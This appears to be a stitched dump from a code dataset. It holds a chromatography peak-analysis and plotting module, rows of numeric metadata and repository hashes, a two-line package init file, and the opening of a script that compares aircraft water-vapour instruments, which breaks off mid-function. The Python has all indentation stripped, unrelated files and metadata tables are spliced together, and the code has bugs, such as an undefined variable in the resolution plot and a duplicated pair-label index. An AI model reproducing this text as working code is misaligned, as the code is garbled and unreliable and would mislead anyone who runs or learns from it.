tmp = {};
tmp.update(sst_data);
tmp.update(desc);
tmp.update({'sample_name':sn});
data_O.append(tmp);
# Plot data over time
if component_names_I:
# use input order
component_names_unique = component_names_I;
else:
# use alphabetical order
component_names_unique = list(set(component_names_all));
component_names_unique.sort();
if plot_type_I == 'single':
for cn in component_names_unique:
data_parameters = {};
data_parameters_stats = {};
for parameter in peakInfo_I:
data_parameters[parameter] = [];
acquisition_date_and_times = [];
acquisition_date_and_times_hrs = [];
sample_names_parameter = [];
sample_types_parameter = [];
component_group_name = None;
for sn_cnt,sn in enumerate(sample_names):
for d in data_O:
if d['sample_name'] == sn and d['component_name'] == cn and d[parameter]:
data_parameters[parameter].append(d[parameter]);
acquisition_date_and_times.append(d['acquisition_date_and_time'])
acquisition_date_and_times_hrs.append(d['acquisition_date_and_time'].year*8765.81277 + d['acquisition_date_and_time'].month*730.484 + d['acquisition_date_and_time'].day*365.242 + d['acquisition_date_and_time'].hour + d['acquisition_date_and_time'].minute / 60. + d['acquisition_date_and_time'].second / 3600.); #convert using datetime object
sample_names_parameter.append(sn);
sample_types_parameter.append(sample_types[sn_cnt])
component_group_name = d['component_group_name'];
# normalize time
acquisition_date_and_times_hrs.sort();
t_start = min(acquisition_date_and_times_hrs);
for t_cnt,t in enumerate(acquisition_date_and_times_hrs):
if y_data_type_I == 'acquisition_date_and_time':acquisition_date_and_times_hrs[t_cnt] = t - t_start;
elif y_data_type_I == 'count':acquisition_date_and_times_hrs[t_cnt] = t_cnt;
title = cn + '\n' + parameter;
filename = filename_O + '_' + experiment_id_I + '_' + cn + '_' + parameter + figure_format_O;
mplot.scatterLinePlot(title,x_title_I,y_title_I,acquisition_date_and_times_hrs,data_parameters[parameter],fit_func_I='lowess',show_eqn_I=False,show_r2_I=False,filename_I=filename,show_plot_I=False);
if plot_type_I == 'multiple':
for parameter in peakInfo_I:
data_parameters = [];
acquisition_date_and_times = [];
acquisition_date_and_times_hrs = [];
sample_names_parameter = [];
sample_types_parameter = [];
component_group_names = [];
component_names = [];
for cn_cnt,cn in enumerate(component_names_unique):
data = [];
acquisition_date_and_time = [];
acquisition_date_and_time_hrs = [];
sample_name_parameter = [];
sample_type_parameter = [];
for sn_cnt,sn in enumerate(sample_names):
for d in data_O:
if d['sample_name'] == sn and d['component_name'] == cn and d[parameter]:
data.append(d[parameter])
acquisition_date_and_time.append(d['acquisition_date_and_time'])
acquisition_date_and_time_hrs.append(d['acquisition_date_and_time'].year*8765.81277 + d['acquisition_date_and_time'].month*730.484 + d['acquisition_date_and_time'].day*365.242 + d['acquisition_date_and_time'].hour + d['acquisition_date_and_time'].minute / 60. + d['acquisition_date_and_time'].second / 3600.); #convert using datetime object
sample_name_parameter.append(sn);
sample_type_parameter.append(sample_types[sn_cnt])
if sn_cnt == 0:
component_group_names.append(d['component_group_name']);
component_names.append(d['component_name']);
# normalize time
acquisition_date_and_time_hrs.sort();
t_start = min(acquisition_date_and_time_hrs);
for t_cnt,t in enumerate(acquisition_date_and_time_hrs):
if y_data_type_I == 'acquisition_date_and_time':acquisition_date_and_time_hrs[t_cnt] = t - t_start;
elif y_data_type_I == 'count':acquisition_date_and_time_hrs[t_cnt] = t_cnt;
data_parameters.append(data);
acquisition_date_and_times.append(acquisition_date_and_time)
acquisition_date_and_times_hrs.append(acquisition_date_and_time_hrs);
sample_names_parameter.append(sample_name_parameter);
sample_types_parameter.append(sample_type_parameter)
title = parameter;
filename = filename_O + '_' + experiment_id_I + '_' + parameter + figure_format_O;
mplot.multiScatterLinePlot(title,x_title_I,y_title_I,acquisition_date_and_times_hrs,data_parameters,data_labels_I=component_group_names,fit_func_I=None,show_eqn_I=False,show_r2_I=False,filename_I=filename,show_plot_I=False);
def export_scatterLinePlot_peakResolution_matplot(self,experiment_id_I,sample_names_I=[],sample_types_I=['Standard'],component_name_pairs_I=[],
peakInfo_I = ['rt_dif','resolution'],
acquisition_date_and_time_I=[None,None],
x_title_I='Time [hrs]',y_title_I='Retention Time [min]',y_data_type_I='acquisition_date_and_time',
plot_type_I='single'):
'''Analyze resolution for critical pairs'''
#Input:
# experiment_id_I
# sample_names_I
# sample_types_I
# component_name_pairs_I = [[component_name_1,component_name_2],...]
# acquisition_date_and_time_I = ['%m/%d/%Y %H:%M','%m/%d/%Y %H:%M']
#TODO: remove after refactor
mplot = matplot();
print('export_peakInformation_resolution...')
#convert string date time to datetime
# e.g. time.strptime('4/15/2014 15:51','%m/%d/%Y %H:%M')
acquisition_date_and_time = [];
if acquisition_date_and_time_I and acquisition_date_and_time_I[0] and acquisition_date_and_time_I[1]:
for dateandtime in acquisition_date_and_time_I:
time_struct = strptime(dateandtime,'%m/%d/%Y %H:%M')
dt = datetime.fromtimestamp(mktime(time_struct))
acquisition_date_and_time.append(dt);
else: acquisition_date_and_time=[None,None]
data_O = [];
component_names_pairs_all = [];
# get sample names
if sample_names_I and sample_types_I and len(sample_types_I)==1:
sample_names = sample_names_I;
sample_types = [sample_types_I[0] for sn in sample_names];
else:
sample_names = [];
sample_types = [];
for st in sample_types_I:
sample_names_tmp = [];
sample_names_tmp = self.get_sampleNames_experimentIDAndSampleType(experiment_id_I,st);
sample_names.extend(sample_names_tmp);
sample_types_tmp = [];
sample_types_tmp = [st for sn in sample_names_tmp];
sample_types.extend(sample_types_tmp);
for sn in sample_names:
print('analyzing peakInformation for sample_name ' + sn);
for component_name_pair in component_name_pairs_I:
# get critical pair data
cpd1 = {};
cpd2 = {};
cpd1 = self.get_peakInfo_sampleNameAndComponentName(sn,component_name_pair[0],acquisition_date_and_time);
cpd2 = self.get_peakInfo_sampleNameAndComponentName(sn,component_name_pair[1],acquisition_date_and_time);
# calculate the RT difference and resolution
rt_dif = 0.0;
rt_dif = abs(cpd1['retention_time']-cpd2['retention_time'])
resolution = 0.0;
resolution = rt_dif/(0.5*(cpd1['width_at_50']+cpd2['width_at_50']));
# record data
data_O.append({'component_name_pair':component_name_pair,
'rt_dif':rt_dif,
'resolution':resolution,
'component_group_name_pair':[cpd1['component_group_name'],cpd2['component_group_name']],
'sample_name':sn,
'acquisition_date_and_time':cpd1['acquisition_date_and_time']});
if plot_type_I == 'single':
for cnp in component_name_pairs_I:
data_parameters = {};
data_parameters_stats = {};
for parameter in peakInfo_I:
data_parameters[parameter] = [];
acquisition_date_and_times = [];
acquisition_date_and_times_hrs = [];
sample_names_parameter = [];
sample_types_parameter = [];
component_group_name_pair = None;
for sn_cnt,sn in enumerate(sample_names):
for d in data_O:
if d['sample_name'] == sn and d['component_name_pair'] == cnp and d[parameter]:
data_parameters[parameter].append(d[parameter]);
acquisition_date_and_times.append(d['acquisition_date_and_time'])
acquisition_date_and_times_hrs.append(d['acquisition_date_and_time'].year*8765.81277 + d['acquisition_date_and_time'].month*730.484 + d['acquisition_date_and_time'].day*365.242 + d['acquisition_date_and_time'].hour + d['acquisition_date_and_time'].minute / 60. + d['acquisition_date_and_time'].second / 3600.); #convert using datetime object
sample_names_parameter.append(sn);
sample_types_parameter.append(sample_types[sn_cnt])
component_group_name_pair = d['component_group_name_pair'];
# normalize time
acquisition_date_and_times_hrs.sort();
t_start = min(acquisition_date_and_times_hrs);
for t_cnt,t in enumerate(acquisition_date_and_times_hrs):
if y_data_type_I == 'acquisition_date_and_time':acquisition_date_and_times_hrs[t_cnt] = t - t_start;
elif y_data_type_I == 'count':acquisition_date_and_times_hrs[t_cnt] = t_cnt;
title = cn + '\n' + parameter;
filename = 'data/_output/' + experiment_id_I + '_' + cn + '_' + parameter + '.png'
mplot.scatterLinePlot(title,x_title_I,y_title_I,acquisition_date_and_times_hrs,data_parameters[parameter],fit_func_I='lowess',show_eqn_I=False,show_r2_I=False,filename_I=filename,show_plot_I=False);
if plot_type_I == 'multiple':
for parameter in peakInfo_I:
data_parameters = [];
acquisition_date_and_times = [];
acquisition_date_and_times_hrs = [];
sample_names_parameter = [];
sample_types_parameter = [];
component_group_names_pair = [];
component_names_pair = [];
for cnp_cnt,cnp in enumerate(component_name_pairs_I):
data = [];
acquisition_date_and_time = [];
acquisition_date_and_time_hrs = [];
sample_name_parameter = [];
sample_type_parameter = [];
for sn_cnt,sn in enumerate(sample_names):
for d in data_O:
if d['sample_name'] == sn and d['component_name_pair'] == cnp and d[parameter]:
data.append(d[parameter])
acquisition_date_and_time.append(d['acquisition_date_and_time'])
acquisition_date_and_time_hrs.append(d['acquisition_date_and_time'].year*8765.81277 + d['acquisition_date_and_time'].month*730.484 + d['acquisition_date_and_time'].day*365.242 + d['acquisition_date_and_time'].hour + d['acquisition_date_and_time'].minute / 60. + d['acquisition_date_and_time'].second / 3600.); #convert using datetime object
sample_name_parameter.append(sn);
sample_type_parameter.append(sample_types[sn_cnt])
if sn_cnt == 0:
component_group_names_pair.append(d['component_group_name_pair']);
component_names_pair.append(d['component_name_pair']);
# normalize time
acquisition_date_and_time_hrs.sort();
t_start = min(acquisition_date_and_time_hrs);
for t_cnt,t in enumerate(acquisition_date_and_time_hrs):
if y_data_type_I == 'acquisition_date_and_time':acquisition_date_and_time_hrs[t_cnt] = t - t_start;
elif y_data_type_I == 'count':acquisition_date_and_time_hrs[t_cnt] = t_cnt;
data_parameters.append(data);
acquisition_date_and_times.append(acquisition_date_and_time)
acquisition_date_and_times_hrs.append(acquisition_date_and_time_hrs);
sample_names_parameter.append(sample_name_parameter);
sample_types_parameter.append(sample_type_parameter)
# create data labels
data_labels = [];
for component_group_names in component_group_names_pair:
data_labels.append(component_group_names[0] + '/' + component_group_names[1]);
title = parameter;
filename = 'data/_output/' + experiment_id_I + '_' + parameter + '.eps'
mplot.multiScatterLinePlot(title,x_title_I,y_title_I,acquisition_date_and_times_hrs,data_parameters,data_labels_I=data_labels,fit_func_I=None,show_eqn_I=False,show_r2_I=False,filename_I=filename,show_plot_I=False);
def export_boxAndWhiskersPlot_peakInformation_matplot(self,experiment_id_I,
peakInfo_parameter_I = ['height','retention_time','width_at_50','signal_2_noise'],
component_names_I=[],
filename_O = 'tmp',
figure_format_O = '.png'):
'''generate a boxAndWhiskers plot from peakInformation table'''
#TODO: remove after refactor
mplot = matplot();
print('export_boxAndWhiskersPlot...')
if peakInfo_parameter_I:
peakInfo_parameter = peakInfo_parameter_I;
else:
peakInfo_parameter = [];
peakInfo_parameter = self.get_peakInfoParameter_experimentID_dataStage01PeakInformation(experiment_id_I);
for parameter in peakInfo_parameter:
data_plot_mean = [];
data_plot_cv = [];
data_plot_ci = [];
data_plot_parameters = [];
data_plot_component_names = [];
data_plot_data = [];
data_plot_units = [];
if component_names_I:
component_names = component_names_I;
else:
component_names = [];
component_names = self.get_componentNames_experimentIDAndPeakInfoParameter_dataStage01PeakInformation(experiment_id_I,parameter);
for cn in component_names:
print('generating boxAndWhiskersPlot for component_name ' + cn);
# get the data
data = {};
data = self.get_row_experimentIDAndPeakInfoParameterComponentName_dataStage01PeakInformation(experiment_id_I,parameter,cn)
if data and data['peakInfo_ave']:
# record data for plotting
data_plot_mean.append(data['peakInfo_ave']);
data_plot_cv.append(data['peakInfo_cv']);
data_plot_ci.append([data['peakInfo_lb'],data['peakInfo_ub']]);
data_plot_data.append(data['peakInfo_data']);
data_plot_parameters.append(parameter);
data_plot_component_names.append(data['component_group_name']);
data_plot_units.append('Retention_time [min]');
# visualize the stats:
data_plot_se = [(x[1]-x[0])/2 for x in data_plot_ci]
filename = filename_O + '_' + experiment_id_I + '_' + parameter + figure_format_O;
mplot.boxAndWhiskersPlot(data_plot_parameters[0],data_plot_component_names,data_plot_units[0],'samples',data_plot_data,data_plot_mean,data_plot_ci,filename_I=filename,show_plot_I=False);
def export_boxAndWhiskersPlot_peakResolution_matplot(self,experiment_id_I,component_name_pairs_I=[],
peakInfo_parameter_I = ['rt_dif','resolution'],
filename_O = 'tmp',
figure_format_O = '.png'):
'''generate a boxAndWhiskers plot from peakResolution table'''
#TODO: remove after refactor
mplot = matplot();
print('export_boxAndWhiskersPlot...')
if peakInfo_parameter_I:
peakInfo_parameter = peakInfo_parameter_I;
else:
peakInfo_parameter = [];
peakInfo_parameter = self.get_peakInfoParameter_experimentID_dataStage01PeakResolution(experiment_id_I);
for parameter in peakInfo_parameter:
data_plot_mean = [];
data_plot_cv = [];
data_plot_ci = [];
data_plot_parameters = [];
data_plot_component_names = [];
data_plot_data = [];
data_plot_units = [];
if component_name_pairs_I:
component_name_pairs = component_name_pairs_I;
else:
component_name_pairs = [];
component_name_pairs = self.get_componentNamePairs_experimentIDAndPeakInfoParameter_dataStage01PeakResolution(experiment_id_I,parameter);
for cn in component_name_pairs:
# get the data
data = {};
data = self.get_row_experimentIDAndPeakInfoParameterComponentName_dataStage01PeakResolution(experiment_id_I,parameter,cn)
if data and data['peakInfo_ave']:
# record data for plotting
data_plot_mean.append(data['peakInfo_ave']);
data_plot_cv.append(data['peakInfo_cv']);
data_plot_ci.append([data['peakInfo_lb'],data['peakInfo_ub']]);
data_plot_data.append(data['peakInfo_data']);
data_plot_parameters.append(parameter);
data_plot_component_names.append(data['component_group_name_pair'][0]+'/'+data['component_group_name_pair'][0]);
data_plot_units.append('Retention_time [min]');
# visualize the stats:
data_plot_se = [(x[1]-x[0])/2 for x in data_plot_ci]
filename = filename_O + '_' + experiment_id_I + '_' + parameter + figure_format_O;
mplot.boxAndWhiskersPlot(data_plot_parameters[0],data_plot_component_names,data_plot_units[0],'samples',data_plot_data,data_plot_mean,data_plot_ci,filename_I=filename,show_plot_I=False);
def export_boxAndWhiskersPlot_peakInformation_js(
self,
experiment_id_I=[],
analysis_id_I=[],
sample_name_abbreviations_I=[],
component_names_I=[],
component_group_names_I=[],
peakInfo_I = ['height','retention_time','width_at_50','signal_2_noise'],
data_dir_I='tmp'):
'''Export data for a box and whiskers plot from peakInformation
INPUT:
#TODO add in template for box and whiskers plot from stats
'''
print('export_boxAndWhiskersPlot...')
data_O = [];
#if peakInfo_parameter_I:
# peakInfo_parameter = peakInfo_parameter_I;
#else:
# peakInfo_parameter = [];
# peakInfo_parameter = self.get_peakInfoParameter_experimentID_dataStage01PeakInformation(experiment_id_I);
#for parameter in peakInfo_parameter:
# if component_names_I:
# component_names = component_names_I;
# else:
# component_names = [];
# component_names = self.get_componentNames_experimentIDAndPeakInfoParameter_dataStage01PeakInformation(experiment_id_I,parameter);
# for cn in component_names:
# print('generating boxAndWhiskersPlot for component_name ' + cn);
# # get the data
# row = [];
# row = self.get_row_experimentIDAndPeakInfoParameterComponentName_dataStage01PeakInformation(experiment_id_I,parameter,cn);
# if row:
# #TODO: fix type in database 'acqusition_date_and_times'
# tmp_list = [];
# for d in row['acqusition_date_and_times']:
# tmp = None;
# tmp = self.convert_datetime2string(d);
# tmp_list.append(tmp);
# row['acqusition_date_and_times'] = tmp_list;
# row['component_name'] = re.escape(row['component_name']);
# data_O.append(row);
data_O = self.get_row_analysisID_dataStage01PeakInformation(
analysis_id_I=analysis_id_I,
experiment_id_I=experiment_id_I,
peakInfo_parameter_I=peakInfo_I,
component_name_I=component_names_I,
component_group_name_I=component_group_names_I,
sample_name_abbreviation_I=sample_name_abbreviations_I
)
# dump chart parameters to a js files
data1_keys = ['experiment_id',
'component_group_name',
'component_name',
'peakInfo_parameter',
#'peakInfo_ave',
#'peakInfo_cv',
#'peakInfo_lb',
#'peakInfo_ub',
#'peakInfo_units',
'sample_name_abbreviation',
#'sample_names',
#'sample_types',
#'acqusition_date_and_times'
];
data1_nestkeys = ['component_name'];
data1_keymap = {'xdata':'component_name',
'ydatamean':'peakInfo_ave',
'ydatalb':'peakInfo_lb',
'ydataub':'peakInfo_ub',
#'ydatamin':None,
#'ydatamax':None,
#'ydataiq1':None,
#'ydataiq3':None,
#'ydatamedian':None,
'serieslabel':'peakInfo_parameter',
'featureslabel':'component_name'};
# make the data object
dataobject_O = [{"data":data_O,"datakeys":data1_keys,"datanestkeys":data1_nestkeys}];
# make the tile parameter objects
formtileparameters_O = {'tileheader':'Filter menu','tiletype':'html','tileid':"filtermenu1",'rowid':"row1",'colid':"col1",
'tileclass':"panel panel-default",'rowclass':"row",'colclass':"col-sm-4"};
formparameters_O = {'htmlid':'filtermenuform1',"htmltype":'form_01',"formsubmitbuttonidtext":{'id':'submit1','text':'submit'},"formresetbuttonidtext":{'id':'reset1','text':'reset'},"formupdatebuttonidtext":{'id':'update1','text':'update'}};
formtileparameters_O.update(formparameters_O);
svgparameters_O = {"svgtype":'boxandwhiskersplot2d_02',"svgkeymap":[data1_keymap],
'svgid':'svg1',
"svgmargin":{ 'top': 50, 'right': 150, 'bottom': 50, 'left': 50 },
"svgwidth":500,"svgheight":350,
"svgx1axislabel":"component_name",
"svgy1axislabel":"parameter_value",
'svgformtileid':'filtermenu1','svgresetbuttonid':'reset1','svgsubmitbuttonid':'submit1'};
svgtileparameters_O = {'tileheader':'Custom box and whiskers plot',
'tiletype':'svg',
'tileid':"tile2",
'rowid':"row1",
'colid':"col2",
'tileclass':"panel panel-default",'rowclass':"row",'colclass':"col-sm-8"};
svgtileparameters_O.update(svgparameters_O);
tableparameters_O = {"tabletype":'responsivetable_01',
'tableid':'table1',
"tablefilters":None,
"tableclass":"table table-condensed table-hover",
'tableformtileid':'filtermenu1','tableresetbuttonid':'reset1','tablesubmitbuttonid':'submit1'};
tabletileparameters_O = {'tileheader':'peakInformation','tiletype':'table','tileid':"tile3",'rowid':"row2",'colid':"col1",
'tileclass':"panel panel-default",'rowclass':"row",'colclass':"col-sm-12"};
tabletileparameters_O.update(tableparameters_O);
parametersobject_O = [formtileparameters_O,svgtileparameters_O,tabletileparameters_O];
tile2datamap_O = {"filtermenu1":[0],"tile2":[0],"tile3":[0]};
# dump the data to a json file
ddtutilities = ddt_container(parameters_I = parametersobject_O,data_I = dataobject_O,tile2datamap_I = tile2datamap_O,filtermenu_I = None);
if data_dir_I=='tmp':
filename_str = self.settings['visualization_data'] + '/tmp/ddt_data.js'
elif data_dir_I=='data_json':
data_json_O = ddtutilities.get_allObjects_js();
return data_json_O;
with open(filename_str,'w') as file:
file.write(ddtutilities.get_allObjects());
def export_boxAndWhiskersPlot_peakResolution_js(self,experiment_id_I,
component_name_pairs_I=[],
peakInfo_parameter_I = ['rt_dif','resolution'],
data_dir_I='tmp'):
'''Export data for a box and whiskers plot'''
print('export_boxAndWhiskersPlot...')
data_O=[];
if peakInfo_parameter_I:
peakInfo_parameter = peakInfo_parameter_I;
else:
peakInfo_parameter = [];
peakInfo_parameter = self.get_peakInfoParameter_experimentID_dataStage01PeakResolution(experiment_id_I);
for parameter in peakInfo_parameter:
if component_name_pairs_I:
component_name_pairs = component_name_pairs_I;
else:
component_name_pairs = [];
component_name_pairs = self.get_componentNamePairs_experimentIDAndPeakInfoParameter_dataStage01PeakResolution(experiment_id_I,parameter);
for cn in component_name_pairs:
# get the data
row = {};
row = self.get_row_experimentIDAndPeakInfoParameterComponentName_dataStage01PeakResolution(experiment_id_I,parameter,cn)
if row and row['peakInfo_ave']:
#TODO: fix type in database 'acqusition_date_and_times'
tmp_list = [];
for d in row['acqusition_date_and_times']:
tmp = None;
tmp = self.convert_datetime2string(d);
tmp_list.append(tmp);
row['acqusition_date_and_times'] = tmp_list;
data_O.append(row);
# dump chart parameters to a js files
data1_keys = ['experiment_id',
'component_group_name_pair',
'component_name_pair',
'peakInfo_parameter',
#'peakInfo_ave',
#'peakInfo_cv',
#'peakInfo_lb',
#'peakInfo_ub',
#'peakInfo_units',
'sample_names',
'sample_types',
#'acqusition_date_and_times'
];
data1_nestkeys = ['component_name_pair'];
data1_keymap = {'xdata':'component_name_pair',
'ydatamean':'peakInfo_ave',
'ydatalb':'peakInfo_lb',
'ydataub':'peakInfo_ub',
#'ydatamin':None,
#'ydatamax':None,
#'ydataiq1':None,
#'ydataiq3':None,
#'ydatamedian':None,
'serieslabel':'peakInfo_parameter',
'featureslabel':'component_name_pair'};
# make the data object
dataobject_O = [{"data":data_O,"datakeys":data1_keys,"datanestkeys":data1_nestkeys}];
# make the tile parameter objects
formtileparameters_O = {'tileheader':'Filter menu','tiletype':'html','tileid':"filtermenu1",'rowid':"row1",'colid':"col1",
'tileclass':"panel panel-default",'rowclass':"row",'colclass':"col-sm-4"};
formparameters_O = {'htmlid':'filtermenuform1',"htmltype":'form_01',"formsubmitbuttonidtext":{'id':'submit1','text':'submit'},"formresetbuttonidtext":{'id':'reset1','text':'reset'},"formupdatebuttonidtext":{'id':'update1','text':'update'}};
formtileparameters_O.update(formparameters_O);
svgparameters_O = {"svgtype":'boxandwhiskersplot2d_01',"svgkeymap":[data1_keymap],
'svgid':'svg1',
"svgmargin":{ 'top': 50, 'right': 150, 'bottom': 50, 'left': 50 },
"svgwidth":500,"svgheight":350,
"svgx1axislabel":"component_name_pair","svgy1axislabel":"parameter_value",
'svgformtileid':'filtermenu1','svgresetbuttonid':'reset1','svgsubmitbuttonid':'submit1'};
svgtileparameters_O = {'tileheader':'Custom box and whiskers plot','tiletype':'svg','tileid':"tile2",'rowid':"row1",'colid':"col2",
'tileclass':"panel panel-default",'rowclass':"row",'colclass':"col-sm-8"};
svgtileparameters_O.update(svgparameters_O);
tableparameters_O = {"tabletype":'responsivetable_01',
'tableid':'table1',
"tablefilters":None,
"tableclass":"table table-condensed table-hover",
'tableformtileid':'filtermenu1','tableresetbuttonid':'reset1','tablesubmitbuttonid':'submit1'};
tabletileparameters_O = {'tileheader':'peakResolution','tiletype':'table','tileid':"tile3",'rowid':"row2",'colid':"col1",
'tileclass':"panel panel-default",'rowclass':"row",'colclass':"col-sm-12"};
tabletileparameters_O.update(tableparameters_O);
parametersobject_O = [formtileparameters_O,svgtileparameters_O,tabletileparameters_O];
tile2datamap_O = {"filtermenu1":[0],"tile2":[0],"tile3":[0]};
# dump the data to a json file
ddtutilities = ddt_container(parameters_I = parametersobject_O,data_I = dataobject_O,tile2datamap_I = tile2datamap_O,filtermenu_I = None);
if data_dir_I=='tmp':
filename_str = self.settings['visualization_data'] + '/tmp/ddt_data.js'
elif data_dir_I=='data_json':
data_json_O = ddtutilities.get_allObjects_js();
return data_json_O;
with open(filename_str,'w') as file:
file.write(ddtutilities.get_allObjects());
| 59.716393 | 374 | 0.587037 | 3,776 | 36,427 | 5.255032 | 0.092161 | 0.041627 | 0.099783 | 0.088696 | 0.875271 | 0.842665 | 0.828151 | 0.819281 | 0.809303 | 0.807892 | 0 | 0.01452 | 0.313696 | 36,427 | 610 | 375 | 59.716393 | 0.77916 | 0.088396 | 0 | 0.705508 | 0 | 0 | 0.149339 | 0.045096 | 0 | 0 | 0 | 0.004918 | 0 | 0 | null | null | 0 | 0.016949 | null | null | 0.019068 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
2867c408a8f9696c8d7bd5acc7262eab2046ff7d | 82 | py | Python | object_rest/__init__.py | jmcs/object-rest | 74398d76dae1f0f0471081376f2b9b593e74e4cb | [
"MIT"
] | null | null | null | object_rest/__init__.py | jmcs/object-rest | 74398d76dae1f0f0471081376f2b9b593e74e4cb | [
"MIT"
] | null | null | null | object_rest/__init__.py | jmcs/object-rest | 74398d76dae1f0f0471081376f2b9b593e74e4cb | [
"MIT"
] | null | null | null | from object_rest.service import Service
from object_rest.documentation import help | 41 | 42 | 0.890244 | 12 | 82 | 5.916667 | 0.583333 | 0.28169 | 0.394366 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.085366 | 82 | 2 | 42 | 41 | 0.946667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
28682c9629780d772ab1faa5bd7d3d2094084789 | 15,834 | py | Python | fig2_scatter_h2o.py | claresinger/StratoClim_H2O_Intercomparison | f9aaad47e7832ac1e10195f94d98c83c612fefc7 | [
"Apache-2.0"
] | null | null | null | fig2_scatter_h2o.py | claresinger/StratoClim_H2O_Intercomparison | f9aaad47e7832ac1e10195f94d98c83c612fefc7 | [
"Apache-2.0"
] | null | null | null | fig2_scatter_h2o.py | claresinger/StratoClim_H2O_Intercomparison | f9aaad47e7832ac1e10195f94d98c83c612fefc7 | [
"Apache-2.0"
] | null | null | null | import numpy as np
import matplotlib.pyplot as plt
import matplotlib.colors as mcolors
import matplotlib.gridspec as gridspec
import seaborn
import datetime
import scipy.stats as stats
flno = [2,3,4,6,7,8]
colors = np.array(["k","#045275","#0C7BDC","#7CCBA2","k","#FED976","#F0746E","#7C1D6F"])
maxlag = [0,0,5,10,10,20]
cmap = 'YlGnBu'
def h2o_pt_by_pt_whist6(dat):
# add cloudy flag
dat['CLOUDY'] = ((dat['NICE'] > 0) | (dat['MASBR'] >= 1.2)).astype(int)
for i,f in enumerate(flno):
for lag in np.arange(1,maxlag[i]):
dat.loc[(dat['FLIGHT'] == f),'CLOUDY'] = np.maximum(dat.loc[(dat['FLIGHT'] == f),'CLOUDY'],
dat[(dat['FLIGHT'] == f)].shift(periods=lag, fill_value=0.0)['CLOUDY'])
# add ascent/descent flag
dz = (dat['ALT'] - dat.shift(periods=1)['ALT'])*1e3
dt = dat['TIME'] - dat.shift(periods=1)['TIME']
vert = np.abs(dz / dt)
vert_avg = vert.rolling(window=20).mean()
dat['ASCENT_FLAG'] = ((vert_avg > 10) | (dat['ALT'] < 12)).astype(int)
# add chiwis flag
dat['CELL_FLAG'] = ((dat['PRES_CELL'] < 30.0) | (dat['PRES_CELL'] > 45.0) | (dat['FLAG'] == 1)).astype(int)
# FL7 dive flag
dat['F7_DIVE'] = ((dat['FLIGHT'] == 7) & (dat['TIME'] > 19.9e3) & (dat['TIME'] < 20.2e3)).astype('int')
fig,axes = plt.subplots(figsize=(20,10),ncols=3,nrows=2,constrained_layout=True)
plt.rcParams.update({"font.size":22})
axused = axes.flatten()
for a,ax in enumerate(axused):
if a < 3:
axin = ax.inset_axes([2,7,3,3], transform=ax.transData)
axin.yaxis.set_label_position("right")
axin.yaxis.tick_right()
axin.plot([2,100],[2,100],"k-")
# plot diagonal lines
ax.plot([2,10],[2,10],"k-")
if a > -1:
ax.plot([0,12],[0,12*1.1],"k--")
ax.plot([0,12],[0,12*0.9],"k--")
ax.plot([0,12],[0,12*1.2],"k:")
ax.plot([0,12],[0,12*0.8],"k:")
# regression
for i,h2ocut in enumerate([100,10]):
datx = dat[(dat['ASCENT_FLAG'] == 0) & (dat['FLH2O'] <= h2ocut)]
if a == 0:
dat1 = datx[(datx['CLOUDY'] == 0) & (datx['FIH2O'] <= h2ocut)]
x = dat1['FIH2O']
y = dat1['FLH2O']
title = "a"
if a == 1:
dat1 = datx[(datx['CLOUDY'] == 0) & (datx['CELL_FLAG'] == 0) & (datx['H2O'] <= h2ocut)]
x = dat1['H2O']
y = dat1['FLH2O']
title = "b"
if a == 2:
dat1 = datx[(datx['CLOUDY'] == 1) & (datx['CELL_FLAG'] == 0) & (datx['F7_DIVE'] == 0) & (datx['H2O'] <= h2ocut)]
x = dat1['H2O']
y = dat1['FLH2O']
title = "c"
if a == 3:
dat1 = datx[(datx['CLOUDY'] == 0) & (datx['FIH2O'] <= h2ocut)]
x = dat1['FIH2O']
y = dat1['FLH2O']
title = "d"
if a == 4:
dat1 = datx[(datx['CLOUDY'] == 0) & (datx['CELL_FLAG'] == 0) & (datx['H2O'] <= h2ocut)]
x = dat1['H2O']
y = dat1['FLH2O']
title = "e"
if a == 5:
dat1 = datx[(datx['CLOUDY'] == 1) & (datx['CELL_FLAG'] == 0) & (datx['F7_DIVE'] == 0) & (datx['H2O'] <= h2ocut)]
x = dat1['H2O']
y = dat1['FLH2O']
title = "f"
mask = ~np.isnan(x) & ~np.isnan(y)
slope, intercept, rvalue, pvalue, se = stats.linregress(x[mask],y[mask])
bias = (x[mask] - y[mask]) / y[mask] * 100.0
absbias = np.abs(bias)
meanbias = np.mean(bias)
if a < 3:
print(title)
print(h2ocut, a, "r2=",rvalue**2)
print("mean bias = ", meanbias, "%")
if i == 1:
w = np.where(absbias <= 10.0)[0]
print(np.round(len(w)/len(absbias) * 100.0), "< 10% diff")
w = np.where(absbias <= 20.0)[0]
print(np.round(len(w)/len(absbias) * 100.0), "< 20% diff")
print()
ax.set_title(title,weight="bold",loc="left")
if a < 3:
ax.set_title("bias={:.2f}%, $r^2=${:.3f}".format(meanbias, rvalue**2),loc="right",fontsize=20)
else:
ax.text(7.6,2.2,"N={}".format(len(x[mask])))
# plot
if a == 0:
dat1 = dat[(dat['ASCENT_FLAG'] == 0) & (dat['CLOUDY'] == 0)]
x = np.array(dat1['FIH2O'])
y = np.array(dat1['FLH2O'])
fi = np.array(dat1['FLIGHT'])
p = np.random.permutation(len(x))
x, y, fi = x[p], y[p], fi[p]
ylabel = r"FLASH H$_2$O (ppmv)"
if a == 1:
dat1 = dat[(dat['ASCENT_FLAG'] == 0) & (dat['CLOUDY'] == 0) & (dat['CELL_FLAG'] == 0)]
x = np.array(dat1['H2O'])
y = np.array(dat1['FLH2O'])
fi = np.array(dat1['FLIGHT'])
p = np.random.permutation(len(x))
x, y, fi = x[p], y[p], fi[p]
ylabel = r"FLASH H$_2$O (ppmv)"
if a == 2:
